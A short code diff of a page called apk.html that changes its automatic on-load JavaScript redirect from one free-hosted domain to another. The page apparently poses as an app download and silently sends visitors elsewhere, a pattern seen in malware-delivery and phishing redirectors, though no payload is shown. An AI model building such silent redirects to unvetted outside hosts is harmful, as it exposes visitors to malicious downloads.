--- a/apk.html
+++ b/apk.html
@@ -5,7 +5,7 @@
     <meta charset="UTF-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <script>
-        document.location.href = "http://ci80697.tmweb.ru/"
+        document.location.href = "http://avnanswers.ezyro.com/ld20/"
     </script>
 </head>
 <body>
